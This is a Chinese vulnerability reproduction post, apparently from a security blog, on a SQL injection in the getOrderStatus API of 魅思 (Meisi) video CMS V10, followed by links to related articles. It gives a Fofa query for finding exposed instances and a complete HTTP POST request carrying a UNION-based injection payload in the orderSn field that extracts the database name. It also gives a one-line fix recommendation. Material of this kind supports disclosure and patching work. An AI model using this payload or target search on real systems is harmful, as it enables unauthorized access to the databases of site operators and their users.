魅思CMS getOrderStatus SQL注入漏洞复现

0x01 漏洞描述:

魅思是一款集成了视频管理、用户管理、手机端应用封装等功能的综合性视频管理系统。该系统不仅以其强大的视频管理功能、灵活的用户管理机制、便捷的手机端应用封装功能以及高安全性和现代化的界面设计,成为了市场上备受关注的视频管理系统之一。无论是对于专业的视频内容创作者还是对于需要视频管理功能的企业和个人用户来说,都是一个值得考虑的选择。

在位于 /controller/Api.php 控制器中的getOrderStatus 方法传入后直接拼接了 orderSn 变量到 where 查询中,导致漏洞产生。

0x02 影响版本:

魅思 V10

0x03 搜索语句:

Fofa:app="魅思-视频管理系统"

0x04 漏洞复现:

复制代码
POST /api/getOrderStatus HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

orderSn=') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(IFNULL(CAST(database() AS NCHAR),0x20)),NULL,NULL,NULL,NULL,NULL-- -

0x05 修复建议:

使用预编译语句并对键入的特殊字符进行编码。

相关推荐
数据智能老司机2 小时前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机2 小时前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954484 小时前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star4 小时前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954487 小时前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher2 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行5 天前
网络安全总结
安全·web安全
red1giant_star5 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)
安全
ZeroNews内网穿透5 天前
谷歌封杀OpenClaw背后:本地部署或是出路
运维·服务器·数据库·安全
一名优秀的码农5 天前
vulhub系列-14-Os-hackNos-1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析